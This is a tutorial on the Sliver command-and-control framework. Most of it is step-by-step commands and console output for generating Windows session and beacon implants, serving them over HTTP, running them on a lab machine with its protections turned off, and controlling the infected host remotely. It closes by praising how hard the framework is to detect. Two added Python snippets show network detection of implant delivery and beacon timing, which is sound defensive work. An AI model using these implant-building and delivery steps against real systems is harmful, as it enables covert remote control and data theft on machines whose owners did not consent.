Sliver C2: Detailed tutorial

This article is a detailed look at Sliver, a tool that drew a lot of attention in 2023 and is gaining popularity among hackers. More details are given in the news on hacker.ru. Happy reading!

Disclaimer: All methods used in the article are demonstrated for educational purposes.

What is Sliver C2

Sliver C2 is an open-source Red Team framework developed by the cybersecurity company BishopFox. It is a cross-platform post-exploitation framework based on Golang.
It is used to perform the second stage of an attack chain on the internal network (when the victim’s computer has already been compromised by available means) and, as its developers themselves claim, is an alternative to commercial tools such as CobaltStrike.

General concepts:

  • implant – the payload used to maintain access privileges on the victim’s computer;

  • beacon – a payload operating in beacon mode, which connects to the server at regular intervals;

  • stage – the loading method, staged or non-staged.

Operating modes:
1. Beacon mode: implements an asynchronous communication method and regularly checks its status;
2. Session mode: implements real-time session mode.

Advantages:
1. Modularity, provides many extensions, for example, various third-party tools can be installed in the arsenal (BOF, .NET tools, etc.)
2. Multiplayer, allowing you to work in a group of several users at the same time;
3. Open source;
4. Cross-platform (supported on Linux, Windows and MacOS)

Sliver C2 architecture

The Sliver C2 architecture consists of three parts:

  • Sliver C2 server. The Sliver C2 server is part of the sliver-server executable, manages the internal database, and starts and stops network listeners. The main interface for interaction with the server is the gRPC interface; all functions are implemented through it.

  • Client console. The client console is the main user interface for interacting with the Sliver C2 server.

  • Implants. Implants are the malicious code, or payloads (exe, ps1, etc.), that run on the target system.

The relationship and form of interaction of each part can be shown as follows:

Installation of Sliver C2

You can install this tool using this link https://github.com/BishopFox/sliver.
You can view and download the release you need using the link: https://github.com/BishopFox/sliver/releases
It is officially recommended to deploy the Server on Linux (Windows is not recommended). Simply find the appropriate version and download the Server and Client versions.
Sliver has two additional features that require external dependencies: MinGW and Metasploit.

  1. To enable DLL payloads (on Linux servers) you need to install MinGW: sudo apt install mingw-w64

  2. To enable some MSF integration features, you must also install Metasploit: wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run

After this, we can safely start our server with the command: ./sliver-server_linux

If you are working alone, the installation is complete and you can directly run the appropriate commands in the terminal. But if you are working in a group with multiple clients, the following steps are necessary.

Create a configuration file for the client:
new-operator --name <client_name> --lhost <server_IP>
and also enable multiplayer mode:
sliver > multiplayer

This creates a configuration file named after our client and the server IP address: Bob_192.168.1.142.cfg

Client installation:
Now we need to install sliver_client in order to connect from our client.
When running it, we first need to import the configuration file we just created:
./sliver-client_linux import /home/kali/Desktop/Bob_192.168.1.142.cfg
After this we run the command:
./sliver-client_linux
And we see that we have connected to the session:

Operation example

Note: The example does not show ways of bypassing anti-virus protection, only how the tool operates, for familiarization. Therefore, for the duration of the exercise, we will turn off the security tools.

Preparing the target

Go to the Microsoft Windows Evaluation Center and download a Windows image. Personally, I used a Windows 10 Enterprise image. Use it to create a Windows virtual machine. All you need is a basic installation. The exact build and patch level doesn’t really matter at this point.

After installation, I recommend disabling all security features. If antivirus is enabled, your standard Sliver implants will die immediately upon launch or not work at all. This is what it should look like:

On your C2 server, start the web server:

systemctl start apache2

Note: You can also use a regular python http server:
python3 -m http.server 80

Both options will be correct.

Now we can copy the implants we created to the folder /var/www/html and they will be available to Apache. To avoid errors with access rights, I advise you to run: chmod -R 777 /var/www/html.

Also, make a note of your C2 server’s IP address. In my case it is 192.168.1.142.
On the target Windows machine, confirm that you can access the C2 server. Open your browser and try connecting to the C2 server on port 80. If everything works, the default Apache page should load:

To receive a session, you can generate an implant, deliver it to the target and execute it there.

Creation of an implant

The implant is generated on the C2 server using the command generate. Connect to the server and run help generate to read the extensive help page and learn about all the flags. The most important of them are the following:

  • --mtls 192.168.1.142: Specifies that the implant should connect to the Sliver server using a TLS connection with mutual authentication. There are also alternatives to TLS:

  • --os windows: indicates that we want to run the implant on Windows (this is the default value, so we can omit this parameter). MacOS and Linux are also supported.

  • --arch amd64: indicates that we need a 64-bit implant (also the default value, can be omitted). In addition there is --arch 386 for 32-bit.

  • --format exe: Indicates that we need an executable file (again the default). Other options:

    • --format shared for dynamic libraries;

    • --format service for a Windows service binary file (can be used with the command psexec);

    • --format shellcode for shellcode (Windows only).

  • --save /var/www/html/: Specifies the directory to save the binary file.

Here is an example of generating a binary file; Sliver named it MEDICAL_CHANGE.exe (the file name is chosen randomly):

sliver > generate --mtls 192.168.1.142 --os windows --arch amd64 --format exe --save /var/www/html

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:18
[*] Implant saved to /var/www/html/MEDICAL_CHANGE.exe

The file /var/www/html/MEDICAL_CHANGE.exe will not be accessible to the Apache server; to make it accessible, run sudo chown www-data:www-data /var/www/html/MEDICAL_CHANGE.exe.
Now start the mTLS listener on the C2 server using the command mtls (by default the listener runs on port 8888). You can view listeners using the command jobs:

sliver > mtls

[*] Starting mTLS listener ...
sliver > 
[*] Successfully started job #1

sliver > jobs

 ID   Name   Protocol   Port 
==== ====== ========== ======
 1    mtls   tcp        8888

On the C2 server you can also verify that port 8888 is now open:

┌──(root㉿kali)-[~/github/sliver]
└─# netstat -antop | grep 8888 
tcp6   0   0 :::8888      :::*      LISTEN   3434/sliver-server   off (0.00/0/0)

Delivery and installation of the implant

On the target Windows system, open a browser and download the implant. Edge will warn you that this is not a regular file. You need to click on the three dots, then “Save” to confirm the download, and then confirm the second Defender SmartScreen warning with “Save Anyway”. Then click “Open File” (or navigate to the file in Explorer and double-click it). This will trigger another SmartScreen warning. Confirm again by clicking “Run anyway”:

After this, your implant should work. On the C2 server in Sliver you should see a line like this, which indicates that the implant session is established:

[*] Session 971c5a23 MEDICAL_CHANGE - 192.168.1.160:50051 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 22:36:48 CEST

You can also run the command sessions to view the list of sessions:

sliver > sessions

 ID         Transport   Remote Address          Hostname          Username    
========== =========== ======================= ================= ========== 
 971c5a23   mtls        192.168.1.160:50051   DESKTOP-IPQVF9T   tester     
 
 Operating System   Health 
================== =========
 windows/amd64      [ALIVE]
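
The delivery sequence above leaves a recognizable trace on the network: an executable fetched over plain HTTP, followed shortly by a connection from the same client to another port on the same server (8888 is the mTLS default mentioned above, but the check does not depend on it). The following is an added detection example, not part of the original article; the event format, the sample lines and the function names are constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from the article). Fields:
# ISO timestamp, client IP, server IP, server port, HTTP request or "-"
SAMPLE_EVENTS = """\
2022-07-01T22:35:10,192.168.1.160,192.168.1.142,80,GET /MEDICAL_CHANGE.exe
2022-07-01T22:36:48,192.168.1.160,192.168.1.142,8888,-
2022-07-01T22:40:02,192.168.1.161,192.168.1.142,80,GET /index.html
2022-07-01T22:41:00,192.168.1.161,192.168.1.142,8888,-
2022-07-01T22:50:00,192.168.1.162,10.0.0.5,80,GET /setup.exe?v=2
2022-07-01T23:59:00,192.168.1.162,10.0.0.5,8888,-
"""

EXEC_SUFFIXES = (".exe", ".dll", ".ps1")

def parse_events(text):
    """Parse the constructed CSV format into dicts sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, detail = line.split(",", 4)
        events.append({"ts": datetime.fromisoformat(ts), "src": src,
                       "dst": dst, "port": int(port), "detail": detail})
    return sorted(events, key=lambda e: e["ts"])

def download_then_callback(events, window=timedelta(minutes=10)):
    """Flag clients that fetched an executable over HTTP and then opened a
    non-HTTP connection to the same server within `window`."""
    last_download = {}            # (client, server) -> (time, path)
    findings = []
    for e in events:
        key = (e["src"], e["dst"])
        if e["detail"].startswith("GET "):
            path = e["detail"][4:].split("?", 1)[0]
            if path.lower().endswith(EXEC_SUFFIXES):
                last_download[key] = (e["ts"], path)
            continue
        hit = last_download.get(key)
        if hit and e["ts"] - hit[0] <= window:
            findings.append({"client": e["src"], "server": e["dst"],
                             "file": hit[1], "callback_port": e["port"],
                             "delay_s": int((e["ts"] - hit[0]).total_seconds())})
    return findings

if __name__ == "__main__":
    for f in download_then_callback(parse_events(SAMPLE_EVENTS)):
        print(f)
```

Only the first client is reported: the second never downloaded an executable, and the third connected back long after the ten-minute window.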

Using a session

You can interact with your session using the command use. Simply enter it and an interactive prompt will appear allowing you to select a session. Press Enter again and your prompt will change to the name of the implant, MEDICAL_CHANGE in my case. The session is now active and ready to receive your commands. With info you can get detailed information about the implant:

sliver > use

? Select a session or beacon: SESSION  971c5a23  MEDICAL_CHANGE  192.168.1.160:50051  DESKTOP-IPQVF9T  DESKTOP-IPQVF9T\tester  windows/amd64
[*] Active session MEDICAL_CHANGE (971c5a23-73e0-4418-b9c2-266484546e0d)

sliver (MEDICAL_CHANGE) > info

        Session ID: 971c5a23-73e0-4418-b9c2-266484546e0d
              Name: MEDICAL_CHANGE
          Hostname: DESKTOP-IPQVF9T
              UUID: d512a12c-6b6d-4f19-814e-1f60088e9563
          Username: DESKTOP-IPQVF9T\tester
               UID: S-1-5-21-2966923018-1740081829-2498838087-1001
               GID: S-1-5-21-2966923018-1740081829-2498838087-513
               PID: 7244
                OS: windows
           Version: 10 build 19044 x86_64
              Arch: amd64
         Active C2: mtls://192.168.1.142:8888
    Remote Address: 192.168.1.160:50051
         Proxy URL: 
Reconnect Interval: 1m0s

Sliver implants support multiple commands. You can get a complete list using help. Features include file system exploration, file copying and downloading, port forwarding, screenshotting, and more.
For example, we can take a screenshot of the victim’s desktop with the command screenshot, and it will be written to your server:

sliver (MEDICAL_CHANGE) > screenshot

[*] Screenshot written to /tmp/screenshot_DESKTOP-IPQVF9T_20220701224728_3343901839.png (893.2 KiB)

Then you can view the screenshot on the C2 server:

When you finish working with the session, type background; the session will still remain active.

To actually end the session, run sessions -k followed by the session ID:

sliver > sessions

 ID         Transport   Remote Address          Hostname          Username    
========== =========== ======================= ================= ========== 
 971c5a23   mtls        192.168.1.160:50051   DESKTOP-IPQVF9T   tester     
 
 Operating System   Health 
================== =========
 windows/amd64      [ALIVE] 

sliver > sessions -k 971c5a23

[!] Lost session 971c5a23 MEDICAL_CHANGE - 192.168.122.160:50051 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 22:52:53 CEST

Beacons

Creating a beacon:

Creating a beacon implant is very similar to creating a session implant. You use the command generate beacon. Learn all about its flags with help generate beacon. In addition to all the flags listed above, the relevant beacon flags are:

  • --seconds 5: Specifies that the beacon should contact the C2 server every 5 seconds. You can also use --minutes, --hours or --days.

  • --jitter 3: Specifies that an additional random delay of up to 3 seconds should be added to the 5 second interval.

sliver > generate beacon --mtls 192.168.1.142 --os windows --arch amd64 --format exe --save /var/www/html --seconds 5 --jitter 3

[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:18
[*] Implant saved to /var/www/html/STALE_PNEUMONIA.exe

Don’t forget to run sudo chown www-data:www-data /var/www/html/STALE_PNEUMONIA.exe to make the payload available to Apache.

Delivery and installation of a beacon implant

This step is the same as for a session implant. Just download and run the file. After this you should see the process STALE_PNEUMONIA.exe running:

Sliver confirms the beacon connection with the following line:

[*] Beacon c9b67cda STALE_PNEUMONIA - 192.168.1.160:50080 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 23:08:31 CEST

Run the command beacons to get a list of active beacons:

sliver > beacons

 ID         Name              Transport   Username   Operating System  
========== ================= =========== ========== ================== 
 c9b67cda   STALE_PNEUMONIA   mtls        tester     windows/amd64     
  
  Last Check-In   Next Check-In 
=============== ===============
  1s ago          5s
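
The --seconds 5 --jitter 3 settings above mean that consecutive check-ins are 5 to 8 seconds apart, which is far more regular than human-driven traffic. The following is an added detection example, not part of the original article: it scores connection timestamps per client/server/port by how tightly the gaps cluster around their median. It assumes each check-in shows up as a separate flow record; the flow tuples, thresholds and function names are constructed for illustration.

```python
import random
from statistics import median

def beacon_score(timestamps, min_events=10):
    """Return (median gap, MAD/median) for one src/dst/port, or None."""
    ts = sorted(timestamps)
    if len(ts) < min_events:
        return None                      # too few connections to judge
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    med = median(gaps)
    if med <= 0:
        return None
    # Median absolute deviation tolerates a few missed check-ins.
    mad = median(abs(g - med) for g in gaps)
    return med, mad / med

def find_beacons(flows, max_rel_spread=0.35, min_events=10):
    """flows: iterable of (epoch_seconds, src, dst, dport)."""
    by_pair = {}
    for ts, src, dst, dport in flows:
        by_pair.setdefault((src, dst, dport), []).append(ts)
    hits = {}
    for pair, stamps in by_pair.items():
        score = beacon_score(stamps, min_events)
        if score and score[1] <= max_rel_spread:
            hits[pair] = score
    return hits

def constructed_flows():
    """Constructed sample: one 5s + 0..3s jitter client, one irregular client."""
    rng = random.Random(1)
    flows, t = [], 0.0
    for _ in range(40):
        t += 5 + rng.uniform(0, 3)       # interval plus jitter, as on the page
        flows.append((t, "192.168.1.160", "192.168.1.142", 8888))
    t = 0.0
    for gap in [1, 40, 3, 120, 2, 15, 300, 4, 60, 7, 2, 90, 11]:
        t += gap                         # bursty, human-driven traffic
        flows.append((t, "192.168.1.161", "192.168.1.142", 80))
    return flows

if __name__ == "__main__":
    for pair, (med, spread) in find_beacons(constructed_flows()).items():
        print(pair, f"median gap {med:.1f}s, relative spread {spread:.2f}")
```

Longer intervals and larger jitter widen the spread, so the threshold and the minimum number of events need tuning against a baseline of the network's normal traffic.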

Using a beacon

As with the session, run the command use, select the beacon you want to interact with and press Enter. The prompt will change to the name of the beacon and you will be able to get more information with info:

sliver > use

? Select a session or beacon: BEACON  c9b67cda  STALE_PNEUMONIA  192.168.1.160:50080  DESKTOP-IPQVF9T  DESKTOP-IPQVF9T\tester  windows/amd64
[*] Active beacon STALE_PNEUMONIA (c9b67cda-75eb-4c30-8920-d743533266fc)

sliver (STALE_PNEUMONIA) > info

         Beacon ID: c9b67cda-75eb-4c30-8920-d743533266fc
              Name: STALE_PNEUMONIA
          Hostname: DESKTOP-IPQVF9T
              UUID: d512a12c-6b6d-4f19-814e-1f60088e9563
          Username: DESKTOP-IPQVF9T\tester
               UID: S-1-5-21-2966923018-1740081829-2498838087-1001
               GID: S-1-5-21-2966923018-1740081829-2498838087-513
               PID: 1748
                OS: windows
           Version: 10 build 19044 x86_64
              Arch: amd64
         Active C2: mtls://192.168.1.142:8888
    Remote Address: 192.168.1.160:50080
         Proxy URL: 
          Interval: 5s
            Jitter: 3s

Use the command help to view a list of all available commands. In the example below I opened Notepad with execute notepad, and to check that it worked I took a screenshot with screenshot. Indeed, you can see that Notepad has been opened:

Notice how each command turns into a task. Since the beacon connection is not persistent, you have to wait for the next check-in before your commands are carried out. To see a list of all tasks and their status, use the command tasks. This example shows that both commands completed successfully:

sliver (STALE_PNEUMONIA) > tasks

 ID         State       Message Type   Created                         
========== =========== ============== ================================  
 93764fdb   completed   Screenshot     Fri, 01 Jul 2022 23:15:23 CEST    
 35d81817   completed   Execute        Fri, 01 Jul 2022 23:14:35 CEST  

 Sent                             Completed                      
 =============================== ===============================
  Fri, 01 Jul 2022 23:15:28 CEST Fri, 01 Jul 2022 23:15:28 CEST 
  Fri, 01 Jul 2022 23:14:36 CEST Fri, 01 Jul 2022 23:14:36 CEST
  

You can now put the beacon in the background, just as with a session.

From beacons to sessions

To switch from beacon mode to session mode, just use the command interactive. To illustrate, let’s assume you just received a beacon like the one below:

[*] Beacon 50010ca8 mtlsbeacon - 192.168.122.160:50422 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 23:24:17 CEST

sliver > beacons

 ID         Name         Transport   Username   Operating System   Last Check-In   Next Check-In 
========== ============ =========== ========== ================== =============== ===============
 50010ca8   mtlsbeacon   mtls        tester     windows/amd64      4s ago          1m11s

sliver > sessions

[*] No sessions

If we don’t have a running session, you just need to select the beacon with use and enter interactive. This queues a new task that will attempt to establish a session. Now wait for the next check-in and a new session should appear:

sliver > use 50010ca8-d96d-4cff-81da-756c1e680fc2

[*] Active beacon mtlsbeacon (50010ca8-d96d-4cff-81da-756c1e680fc2)

sliver (mtlsbeacon) > interactive

[*] Using beacon's active C2 endpoint: mtls://192.168.1.142:8888
[*] Tasked beacon mtlsbeacon (a050cc2a)

[*] Session ab1ecb8a mtlsbeacon - 192.168.122.160:50425 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 23:25:32 CEST

sliver (mtlsbeacon) > sessions

 ID         Transport   Remote Address          Hostname          Username   Operating System   Health  
========== =========== ======================= ================= ========== ================== =========
 ab1ecb8a   mtls        192.168.1.160:50425     DESKTOP-IPQVF9T   tester     windows/amd64      [ALIVE]

By default, the session will be created using the same C2 protocol used by the beacon. However, it is possible to specify another one, provided that support for it was compiled into the implant (yes, more than one C2 protocol can be specified at the same time). Enter interactive --help to see all options.

Profiles

Creating an implant can be tedious because you have to enter so many options. To make things easier, define reusable profiles with a common implant configuration. I’ll demonstrate this below for session and beacon implants.
Create a session implant profile using profiles new. For example, this profile corresponds to the session implant created above:

sliver (STALE_PNEUMONIA) > profiles new --mtls 192.168.1.142 --os windows --arch amd64 --format exe session_win_default

[*] Saved new implant profile session_win_default

With profiles generate you can create a new session implant from this profile. For example:

sliver (STALE_PNEUMONIA) > profiles generate --save /var/www/html/ session_win_default

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:18
[*] Implant saved to /var/www/html/CAUTIOUS_UNITY.exe

By using profiles new beacon you can also create a beacon profile:

sliver > profiles new beacon --mtls 192.168.1.142 --os windows --arch amd64 --format exe  --seconds 5 --jitter 3 beacon_win_default

[*] Saved new implant profile (beacon) beacon_win_default

Create a beacon implant:

sliver > profiles generate --save /var/www/html/ beacon_win_default

[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:18
[*] Implant saved to /var/www/html/WELSH_SECURE.exe

To view all the implants you have generated, use the command implants:

sliver > implants

 Name              Implant Type   OS/Arch         Format       Command & Control               Debug 
================= ============== =============== ============ =============================== =======
 CAUTIOUS_UNITY    session        windows/amd64   EXECUTABLE   [1] mtls://192.168.1.142:8888   false 
 MEDICAL_CHANGE    session        windows/amd64   EXECUTABLE   [1] mtls://192.168.1.142:8888   false 
 STALE_PNEUMONIA   beacon         windows/amd64   EXECUTABLE   [1] mtls://192.168.1.142:8888   false 
 WELSH_SECURE      beacon         windows/amd64   EXECUTABLE   [1] mtls://192.168.1.142:8888   false 

Conclusion

In my opinion, the biggest advantage of Sliver is that it is more difficult for the system to detect, which cannot be said about other tools. In addition, it is cross-platform and easier to install. However, the downside is its generated shell, which is quite large compared to other frameworks. The framework itself is quite similar to CobaltStrike, but surpasses it due to its great functionality.
